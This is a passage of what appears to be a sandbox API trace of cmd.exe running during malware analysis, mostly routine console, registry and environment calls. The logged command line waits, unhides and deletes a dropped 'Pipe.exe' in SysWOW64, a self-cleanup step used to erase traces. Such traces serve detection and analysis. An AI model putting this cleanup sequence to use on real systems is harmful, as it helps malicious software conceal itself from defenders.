(in: CodePage=0x1b5, lpCPInfo=0x4a004260 | out: lpCPInfo=0x4a004260) returned 1 [0100.632] SetConsoleCtrlHandler (HandlerRoutine=0x49ffe72a, Add=1) returned 1 [0100.632] _get_osfhandle (_FileHandle=1) returned 0x7 [0100.632] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0100.633] _get_osfhandle (_FileHandle=1) returned 0x7 [0100.633] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a0041ac | out: lpMode=0x4a0041ac) returned 1 [0100.633] _get_osfhandle (_FileHandle=1) returned 0x7 [0100.633] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0100.634] _get_osfhandle (_FileHandle=0) returned 0x3 [0100.634] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a0041b0 | out: lpMode=0x4a0041b0) returned 1 [0100.636] _get_osfhandle (_FileHandle=0) returned 0x3 [0100.636] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x187) returned 1 [0100.636] GetEnvironmentStringsW () returned 0x6d1f30* [0100.636] GetProcessHeap () returned 0x6c0000 [0100.637] RtlAllocateHeap (HeapHandle=0x6c0000, Flags=0x8, Size=0xa12) returned 0x6d2950 [0100.637] FreeEnvironmentStringsW (penv=0x6d1f30) returned 1 [0100.637] GetProcessHeap () returned 0x6c0000 [0100.637] RtlAllocateHeap (HeapHandle=0x6c0000, Flags=0x8, Size=0x4) returned 0x6d1610 [0100.637] GetEnvironmentStringsW () returned 0x6d1f30* [0100.637] GetProcessHeap () returned 0x6c0000 [0100.637] RtlAllocateHeap (HeapHandle=0x6c0000, Flags=0x8, Size=0xa12) returned 0x6d3370 [0100.637] FreeEnvironmentStringsW (penv=0x6d1f30) returned 1 [0100.637] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x3bea9c | out: phkResult=0x3bea9c*=0x68) returned 0x0 [0100.637] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x3beaa4, lpData=0x3beaa8, lpcbData=0x3beaa0*=0x1000 | out: lpType=0x3beaa4*=0x0, lpData=0x3beaa8*=0x0, lpcbData=0x3beaa0*=0x1000) returned 0x2 [0100.637] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x3beaa4, lpData=0x3beaa8, lpcbData=0x3beaa0*=0x1000 | out: lpType=0x3beaa4*=0x4, lpData=0x3beaa8*=0x1, lpcbData=0x3beaa0*=0x4) returned 0x0 [0100.638] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x3beaa4, lpData=0x3beaa8, lpcbData=0x3beaa0*=0x1000 | out: lpType=0x3beaa4*=0x0, lpData=0x3beaa8*=0x1, lpcbData=0x3beaa0*=0x1000) returned 0x2 [0100.638] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x3beaa4, lpData=0x3beaa8, lpcbData=0x3beaa0*=0x1000 | out: lpType=0x3beaa4*=0x4, lpData=0x3beaa8*=0x0, lpcbData=0x3beaa0*=0x4) returned 0x0 [0100.638] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x3beaa4, lpData=0x3beaa8, lpcbData=0x3beaa0*=0x1000 | out: lpType=0x3beaa4*=0x4, lpData=0x3beaa8*=0x40, lpcbData=0x3beaa0*=0x4) returned 0x0 [0100.638] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x3beaa4, lpData=0x3beaa8, lpcbData=0x3beaa0*=0x1000 | out: lpType=0x3beaa4*=0x4, lpData=0x3beaa8*=0x40, lpcbData=0x3beaa0*=0x4) returned 0x0 [0100.638] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x3beaa4, lpData=0x3beaa8, lpcbData=0x3beaa0*=0x1000 | out: lpType=0x3beaa4*=0x0, lpData=0x3beaa8*=0x40, lpcbData=0x3beaa0*=0x1000) returned 0x2 [0100.638] RegCloseKey (hKey=0x68) returned 0x0 [0100.638] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x3bea9c | out: phkResult=0x3bea9c*=0x68) returned 0x0 [0100.638] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x3beaa4, lpData=0x3beaa8, lpcbData=0x3beaa0*=0x1000 | out: lpType=0x3beaa4*=0x0, lpData=0x3beaa8*=0x40, lpcbData=0x3beaa0*=0x1000) returned 0x2 [0100.638] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x3beaa4, lpData=0x3beaa8, lpcbData=0x3beaa0*=0x1000 | out: lpType=0x3beaa4*=0x4, lpData=0x3beaa8*=0x1, lpcbData=0x3beaa0*=0x4) returned 0x0 [0100.638] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x3beaa4, lpData=0x3beaa8, lpcbData=0x3beaa0*=0x1000 | out: lpType=0x3beaa4*=0x0, lpData=0x3beaa8*=0x1, lpcbData=0x3beaa0*=0x1000) returned 0x2 [0100.638] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x3beaa4, lpData=0x3beaa8, lpcbData=0x3beaa0*=0x1000 | out: lpType=0x3beaa4*=0x4, lpData=0x3beaa8*=0x0, lpcbData=0x3beaa0*=0x4) returned 0x0 [0100.638] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x3beaa4, lpData=0x3beaa8, lpcbData=0x3beaa0*=0x1000 | out: lpType=0x3beaa4*=0x4, lpData=0x3beaa8*=0x9, lpcbData=0x3beaa0*=0x4) returned 0x0 [0100.638] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x3beaa4, lpData=0x3beaa8, lpcbData=0x3beaa0*=0x1000 | out: lpType=0x3beaa4*=0x4, lpData=0x3beaa8*=0x9, lpcbData=0x3beaa0*=0x4) returned 0x0 [0100.638] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x3beaa4, lpData=0x3beaa8, lpcbData=0x3beaa0*=0x1000 | out: lpType=0x3beaa4*=0x0, lpData=0x3beaa8*=0x9, lpcbData=0x3beaa0*=0x1000) returned 0x2 [0100.638] RegCloseKey (hKey=0x68) returned 0x0 [0100.638] time (in: timer=0x0 | out: timer=0x0) returned 0x5ef459e4 [0100.638] srand (_Seed=0x5ef459e4) [0100.639] GetCommandLineW () returned="cmd /c choice /t 10 /d y & attrib -h \"C:\\Windows\\SysWOW64\\Pipe.exe\" & del \"C:\\Windows\\SysWOW64\\Pipe.exe\"" [0100.639] GetCommandLineW () returned="cmd /c choice /t 10 /d y & attrib -h \"C:\\Windows\\SysWOW64\\Pipe.exe\" & del \"C:\\Windows\\SysWOW64\\Pipe.exe\"" [0100.640] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a005260 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0100.640] GetProcessHeap () returned 0x6c0000 [0100.640] RtlAllocateHeap (HeapHandle=0x6c0000, Flags=0x8, Size=0x210) returned 0x6d3d90 [0100.640] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x6d3d98, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0100.641] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a010640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\;") returned 0x64 [0100.641] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a010640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0100.641] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a010640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0100.641] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0100.641] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0100.641] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0100.641] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0100.641] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0100.641] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0100.641] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0100.641] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0100.641] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0100.642] GetProcessHeap () returned 0x6c0000 [0100.642] HeapFree (in: hHeap=0x6c0000, dwFlags=0x0, lpMem=0x6d2950 | out: hHeap=0x6c0000) returned 1 [0100.642] GetEnvironmentStringsW () returned 0x6d1f30* [0100.642] GetProcessHeap () returned 0x6c0000 [0100.642] RtlAllocateHeap (HeapHandle=0x6c0000, Flags=0x8, Size=0xa2a) returned 0x6d49e0 [0100.642] FreeEnvironmentStringsW (penv=0x6d1f30) returned 1 [0100.642] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a010640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0100.642] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a010640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0100.642] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0100.642] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0100.642] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0100.642] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0100.642] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0100.642] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0100.642] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0100.642] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0100.642] GetProcessHeap () returned 0x6c0000 [0100.642] RtlAllocateHeap (HeapHandle=0x6c0000, Flags=0x8, Size=0x30) returned 0x6d1db0 [0100.642] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3bf868 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0100.643] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x104, lpBuffer=0x3bf868, lpFilePart=0x3bf864 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x3bf864*="system32") returned 0x13 [0100.643] GetFileAttributesW (lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32")) returned 0x10 [0100.643] FindFirstFileW (in: lpFileName="C:\\Windows", lpFindFileData=0x3bf5e4 | out: lpFindFileData=0x3bf5e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 0x6c07f0 [0100.643] FindClose (in: hFindFile=0x6c07f0 | out: hFindFile=0x6c07f0) returned 1 [0100.643] FindFirstFileW (in: lpFileName="C:\\Windows\\system32", lpFindFileData=0x3bf5e4 | out: lpFindFileData=0x3bf5e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="System32", cAlternateFileName="")) returned 0x6c07f0 [0100.643] FindClose (in: hFindFile=0x6c07f0 | out: hFindFile=0x6c07f0) returned 1 [0100.643] GetFileAttributesW (lpFileName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 0x10 [0100.643] SetCurrentDirectoryW (lpPathName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 1 [0100.644] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Windows\\System32") returned 1 [0100.644] GetProcessHeap () returned 0x6c0000 [0100.644] HeapFree (in: hHeap=0x6c0000, dwFlags=0x0, lpMem=0x6d49e0 | out: hHeap=0x6c0000) returned 1 [0100.644] GetEnvironmentStringsW () returned 0x6d1f30* [0100.644] GetProcessHeap () returned 0x6c0000 [0100.644] RtlAllocateHeap (HeapHandle=0x6c0000, Flags=0x8, Size=0xa5a) returned 0x6d3fa8 [0100.644] FreeEnvironmentStringsW (penv=0x6d1f30) returned 1 [0100.644] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a005260 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0100.644] GetProcessHeap () returned 0x6c0000 [0100.644] HeapFree (in: hHeap=0x6c0000, dwFlags=0x0, lpMem=0x6d1db0 | out: hHeap=0x6c0000) returned 1 [0100.644] GetProcessHeap () returned 0x6c0000 [0100.644] RtlAllocateHeap (HeapHandle=0x6c0000, Flags=0x8, Size=0x400e) returned 0x6d5e80 [0100.645] GetProcessHeap () returned 0x6c0000 [0100.645] RtlAllocateHeap (HeapHandle=0x6c0000, Flags=0x8, Size=0xd0) returned 0x6c1030 [0100.645] GetProcessHeap () returned 0x6c0000 [0100.645] HeapFree (in: hHeap=0x6c0000, dwFlags=0x0, lpMem=0x6d5e80 | out: hHeap=0x6c0000) returned 1 [0100.645] GetConsoleOutputCP () returned 0x1b5 [0100.645] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a004260 | out: lpCPInfo=0x4a004260) returned 1 [0100.645] GetUserDefaultLCID () returned 0x409 [0100.646] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a004950, cchData=8 | out: lpLCData=":") returned 2 [0100.646] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x3bf9a8, cchData=128 | out: lpLCData="0") returned 2 [0100.646] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x3bf9a8, cchData=128 | out: lpLCData="0") returned 2 [0100.646] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x3bf9a8, cchData=128 | out: lpLCData="1") returned 2 [0100.646] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a004940, cchData=8 | out: lpLCData="/") returned 2 [0100.646] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a004d80, cchData=32 | out: lpLCData="Mon") returned 4 [0100.647] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a004d40, cchData=32 | out: lpLCData="Tue") returned 4 [0100.647] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a004d00, cchData=32 | out: lpLCData="Wed") returned 4 [0100.647] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a004cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0100.647] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a004c80, cchData=32 | out: lpLCData="Fri") returned 4 [0100.647] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a004c40, cchData=32 | out: lpLCData="Sat") returned 4 [0100.647] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a004c00, cchData=32 | out: lpLCData="Sun") returned 4 [0100.647] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a004930, cchData=8 | out: lpLCData=".") returned 2 [0100.647] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a004920, cchData=8 | out: lpLCData=",") returned 2 [0100.647] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0100.657] GetProcessHeap () returned 0x6c0000 [0100.657] RtlAllocateHeap (HeapHandle=0x6c0000, Flags=0x0, Size=0x20c) returned 0x6d4a10 [0100.657] GetConsoleTitleW (in: lpConsoleTitle=0x6d4a10, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SysWOW64\\cmd.exe") returned 0x1b [0100.657] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0100.657] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileExW") returned 0x76d63b92 [0100.657] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0100.657] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleInputExeNameW") returned 0x76d5a79d [0100.659] GetProcessHeap () returned 0x6c0000 [0100.659] RtlAllocateHeap (HeapHandle=0x6c0000, Flags=0x8, Size=0x400a) returned 0x6d5e80 [0100.659] GetProcessHeap () returned 0x6c0000 [0100.659] HeapFree (in: hHeap=0x6c0000, dwFlags=0x0, lpMem=0x6d5e80 | out: hHeap=0x6c0000) returned 1 [0100.659] _wcsicmp (_String1="choice", _String2=")") returned 58 [0100.659] _wcsicmp (_String1="FOR", _String2="choice") returned 3 [0100.660] _wcsicmp (_String1="FOR/?", _String2="choice") returned 3 [0100.660] _wcsicmp (_String1="IF", _String2="choice") returned 6 [0100.660] _wcsicmp (_String1="IF/?", _String2="choice") returned 6 [0100.660] _wcsicmp (_String1="REM", _String2="choice") returned 15 [0100.660] _wcsicmp (_String1="REM/?", _String2="choice") returned 15 [0100.660] GetProcessHeap () returned 0x6c0000 [0100.660] RtlAllocateHeap (HeapHandle=0x6c0000, Flags=0x8, Size=0x58) returned 0x6c1108 [0100.660] GetProcessHeap () returned 0x6c0000 [0100.660] RtlAllocateHeap (HeapHandle=0x6c0000, Flags=0x8, Size=0x16) returned 0x6d1db0 [0100.660] GetProcessHeap () returned 0x6c0000 [0100.660] RtlAllocateHeap (HeapHandle=0x6c0000, Flags=0x8, Size=0x22) returned 0x6d1dd0 [0100.661] GetProcessHeap () returned 0x6c0000 [0100.661] RtlAllocateHeap (HeapHandle=0x6c0000, Flags=0x8, Size=0x58) returned 0x6c1168 [0100.662] _wcsicmp (_String1="attrib", _String2=")") returned 56 [0100.662] _wcsicmp (_String1="FOR", _String2="attrib") returned 5 [0100.662] _wcsicmp (_String1="FOR/?", _String2="attrib") returned 5 [0100.662] _wcsicmp (_String1="IF", _String2="attrib") returned 8 [0100.662] _wcsicmp (_String1="IF/?", _String2="attrib") returned 8 [0100.662] _wcsicmp (_String1="REM", _String2="attrib") returned 17 [0100.662] _wcsicmp (_String1="REM/?", _String2="attrib") returned 17 [0100.662] GetProcessHeap () returned 0x6c0000 [0100.662] RtlAllocateHeap (HeapHandle=0x6c0000, Flags=0x8, Size=0x58) returned 0x6d4c28 [0100.662] GetProcessHeap () returned 0x6c0000 [0100.662] RtlAllocateHeap (HeapHandle=0x6c0000, Flags=0x8, Size=0x16) returned 0x6c11c8 [0100.663] GetProcessHeap () returned 0x6c0000 [0100.663] RtlAllocateHeap (HeapHandle=0x6c0000, Flags=0x8, Size=0x50) returned 0x6d4c88 [0100.664] GetProcessHeap () returned 0x6c0000 [0100.664] RtlAllocateHeap (HeapHandle=0x6c0000, Flags=0x8, Size=0x58) returned 0x6d4ce0 [0100.665] _wcsicmp (_String1="del", _String2=")") returned 59 [0100.665] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0100.665] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0100.665] _wcsicmp (_String1="IF", _String2="del") returned 5 [0100.665] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0100.665] _wcsicmp (_String1="REM", _String2="del") returned 14 [0100.665] _wcsicmp (_String1="REM/?", _String2="del") returned 14 [0100.665] GetProcessHeap () returned 0x6c0000 [0100.665] RtlAllocateHeap (HeapHandle=0x6c0000, Flags=0x8, Size=0x58) returned 0x6d4d40 [0100.665] GetProcessHeap () returned 0x6c0000 [0100.665] RtlAllocateHeap (HeapHandle=0x6c0000, Flags=0x8, Size=0x10) returned 0x6cfe18 [0100.666] GetProcessHeap () returned 0x6c0000 [0100.666] RtlAllocateHeap (HeapHandle=0x6c0000, Flags=0x8, Size=0x48) returned 0x6d4da0 [0100.667] GetConsoleTitleW (in: lpConsoleTitle=0x3bf63c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SysWOW64\\cmd.exe") returned 0x1b [0100.668] _wcsicmp (_String1="choice", _String2="DIR") returned -1 [0100.668] _wcsicmp (_String1="choice", _String2="ERASE") returned -2 [0100.668] _wcsicmp (_String1="choice", _String2="DEL") returned -1 [0100.668] _wcsicmp (_String1="choice", _String2="TYPE") returned -17 [0100.668] _wcsicmp (_String1="choice", _String2="COPY") returned -7 [0100.668] _wcsicmp (_String1="choice", _String2="CD") returned 4 [0100.668] _wcsicmp (_String1="choice", _String2="CHDIR") returned 11 [0100.668] _wcsicmp (_String1="choice", _String2="RENAME") returned -15 [0100.668] _wcsicmp (_String1="choice", _String2="REN") returned -15 [0100.668] _wcsicmp (_String1="choice", _String2="ECHO") returned -2 [0100.668] _wcsicmp (_String1="choice", _String2="SET") returned -16 [0100.668] _wcsicmp (_String1="choice", _String2="PAUSE") returned -13 [0100.668] _wcsicmp (_String1="choice", _String2="DATE") returned -1 [0100.668] _wcsicmp (_String1="choice", _String2="TIME") returned -17 [0100.668] _wcsicmp (_String1="choice", _String2="PROMPT") returned -13 [0100.668] _wcsicmp (_String1="choice", _String2="MD") returned -10 [0100.668] _wcsicmp (_String1="choice", _String2="MKDIR") returned -10 [0100.668] _wcsicmp (_String1="choice", _String2="RD") returned -15 [0100.668] _wcsicmp (_String1="choice", _String2="RMDIR") returned -15 [0100.668] _wcsicmp (_String1="choice", _String2="PATH") returned -13 [0100.668] _wcsicmp (_String1="choice", _String2="GOTO") returned -4 [0100.668] _wcsicmp (_String1="choice", _String2="SHIFT") returned -16 [0100.668] _wcsicmp (_String1="choice", _String2="CLS") returned -4 [0100.668] _wcsicmp (_String1="choice", _String2="CALL") returned 7 [0100.669] _wcsicmp (_String1="choice", _String2="VERIFY") returned -19 [0100.669] _wcsicmp (_String1="choice", _String2="VER") returned -19 [0100.669] _wcsicmp (_String1="choice", _String2="VOL") returned -19 [0100.669] _wcsicmp (_String1="choice", _String2="EXIT") returned -2 [0100.669] _wcsicmp (_String1="choice", _String2="SETLOCAL") returned -16 [0100.669] _wcsicmp (_String1="choice", _String2="ENDLOCAL") returned -2 [0100.669] _wcsicmp (_String1="choice", _String2="TITLE") returned -17 [0100.669] _wcsicmp (_String1="choice", _String2="START") returned -16 [0100.669] _wcsicmp (_String1="choice", _String2="DPATH") returned -1 [0100.669] _wcsicmp (_String1="choice", _String2="KEYS") returned -8 [0100.669] _wcsicmp (_String1="choice", _String2="MOVE") returned -10 [0100.669] _wcsicmp (_String1="choice", _String2="PUSHD") returned -13 [0100.669] _wcsicmp (_String1="choice", _String2="POPD") returned -13 [0100.669] _wcsicmp (_String1="choice", _String2="ASSOC") returned 2 [0100.669] _wcsicmp (_String1="choice", _String2="FTYPE") returned -3 [0100.669] _wcsicmp (_String1="choice", _String2="BREAK") returned 1 [0100.669] _wcsicmp (_String1="choice", _String2="COLOR") returned -7 [0100.669] _wcsicmp (_String1="choice", _String2="MKLINK") returned -10 [0100.669] _wcsicmp (_String1="choice", _String2="DIR") returned -1 [0100.669] _wcsicmp (_String1="choice", _String2="ERASE") returned -2 [0100.669] _wcsicmp (_String1="choice", _String2="DEL") returned -1 [0100.669] _wcsicmp (_String1="choice", _String2="TYPE") returned -17 [0100.669] _wcsicmp (_String1="choice", _String2="COPY") returned -7 [0100.669] _wcsicmp (_String1="choice", _String2="CD") returned 4 [0100.669] _wcsicmp (_String1="choice", _String2="CHDIR") returned 11 [0100.669] _wcsicmp (_String1="choice", _String2="RENAME") returned -15 [0100.670] _wcsicmp (_String1="choice", _String2="REN") returned -15 [0100.670] _wcsicmp (_String1="choice", _String2="ECHO") returned -2 [0100.670] _wcsicmp (_String1="choice", _String2="SET") returned -16 [0100.670] _wcsicmp (_String1="choice", _String2="PAUSE") returned -13 [0100.670] _wcsicmp (_String1="choice", _String2="DATE") returned -1 [0100.670] _wcsicmp (_String1="choice", _String2="TIME") returned -17 [0100.670] _wcsicmp (_String1="choice", _String2="PROMPT") returned -13 [0100.670] _wcsicmp (_String1="choice", _String2="MD") returned -10 [0100.670] _wcsicmp (_String1="choice", _String2="MKDIR") returned -10 [0100.670] _wcsicmp (_String1="choice", _String2="RD") returned -15 [0100.670] _wcsicmp (_String1="choice", _String2="RMDIR") returned -15 [0100.670] _wcsicmp (_String1="choice", _String2="PATH") returned -13 [0100.670] _wcsicmp (_String1="choice", _String2="GOTO") returned -4 [0100.670] _wcsicmp (_String1="choice", _String2="SHIFT") returned -16 [0100.670] _wcsicmp (_String1="choice", _String2="CLS") returned -4 [0100.670] _wcsicmp (_String1="choice", _String2="CALL") returned 7 [0100.670] _wcsicmp (_String1="choice", _String2="VERIFY") returned -19 [0100.670] _wcsicmp (_String1="choice", _String2="VER") returned -19 [0100.670] _wcsicmp (_String1="choice", _String2="VOL") returned -19 [0100.670] _wcsicmp (_String1="choice", _String2="EXIT") returned -2 [0100.670] _wcsicmp (_String1="choice", _String2="SETLOCAL") returned -16 [0100.670] _wcsicmp (_String1="choice", _String2="ENDLOCAL") returned -2 [0100.670] _wcsicmp (_String1="choice", _String2="TITLE") returned -17 [0100.670] _wcsicmp (_String1="choice", _String2="START") returned -16 [0100.670] _wcsicmp (_String1="choice", _String2="DPATH") returned -1 [0100.670] _wcsicmp (_String1="choice", _String2="KEYS") returned -8 [0100.670] _wcsicmp (_String1="choice", _String2="MOVE") returned -10 [0100.670] _wcsicmp (_String1="choice", _String2="PUSHD") returned -13 [0100.670] _wcsicmp (_String1="choice", _String2="POPD") returned -13 [0100.671] _wcsicmp (_String1="choice", _String2="ASSOC") returned 2 [0100.671] _wcsicmp (_String1="choice", _String2="FTYPE") returned -3 [0100.671] _wcsicmp (_String1="choice", _String2="BREAK") returned 1 [0100.671] _wcsicmp (_String1="choice", _String2="COLOR") returned -7 [0100.671] _wcsicmp (_String1="choice", _String2="MKLINK") returned -10 [0100.671] _wcsicmp (_String1="choice", _String2="FOR") returned -3 [0100.671] _wcsicmp (_String1="choice", _String2="IF") returned -6 [0100.671] _wcsicmp (_String1="choice", _String2="REM") returned -15 [0100.671] GetProcessHeap () returned 0x6c0000 [0100.671] RtlAllocateHeap (HeapHandle=0x6c0000, Flags=0x8, Size=0x210) returned 0x6d4df0 [0100.671] GetProcessHeap () returned 0x6c0000 [0100.671] RtlAllocateHeap (HeapHandle=0x6c0000, Flags=0x8, Size=0x30) returned 0x6d5008 [0100.671] _wcsnicmp (_String1="choi", _String2="cmd ", _MaxCount=0x4) returned -5 [0100.672] GetProcessHeap () returned 0x6c0000 [0100.672] RtlAllocateHeap (HeapHandle=0x6c0000, Flags=0x8, Size=0x418) returned 0x6d1f30 [0100.672] SetErrorMode (uMode=0x0) returned 0x1 [0100.672] SetErrorMode (uMode=0x1) returned 0x0 [0100.672] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x6d1f38, lpFilePart=0x3bf15c | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x3bf15c*="system32") returned 0x13 [0100.672] SetErrorMode (uMode=0x1) returned 0x1 [0100.672] GetProcessHeap () returned 0x6c0000 [0100.672] RtlReAllocateHeap (Heap=0x6c0000, Flags=0x0, Ptr=0x6d1f30, Size=0x3e) returned 0x6d1f30 [0100.672] GetProcessHeap () returned 0x6c0000 [0100.672] RtlSizeHeap (HeapHandle=0x6c0000, Flags=0x0, MemoryPointer=0x6d1f30) returned 0x3e [0100.672] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a010640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\;") returned 0x64 [0100.672] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0100.672] GetProcessHeap () returned 0x6c0000 [0100.672] RtlAllocateHeap (HeapHandle=0x6c0000, Flags=0x8, Size=0xfe) returned 0x6d5040 [0100.672] GetProcessHeap () returned 0x6c0000 [0100.672] RtlAllocateHeap (HeapHandle=0x6c0000, Flags=0x8, Size=0x1f4) returned 0x6d5148 [0100.681] GetProcessHeap () returned 0x6c0000 [0100.681] RtlReAllocateHeap (Heap=0x6c0000, Flags=0x0, Ptr=0x6d5148, Size=0x100) returned 0x6d5148 [0100.681] GetProcessHeap () returned 0x6c0000 [0100.681] RtlSizeHeap (HeapHandle=0x6c0000, Flags=0x0, MemoryPointer=0x6d5148) returned 0x100 [0100.681] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a010640, nSize=0x2000 | out: 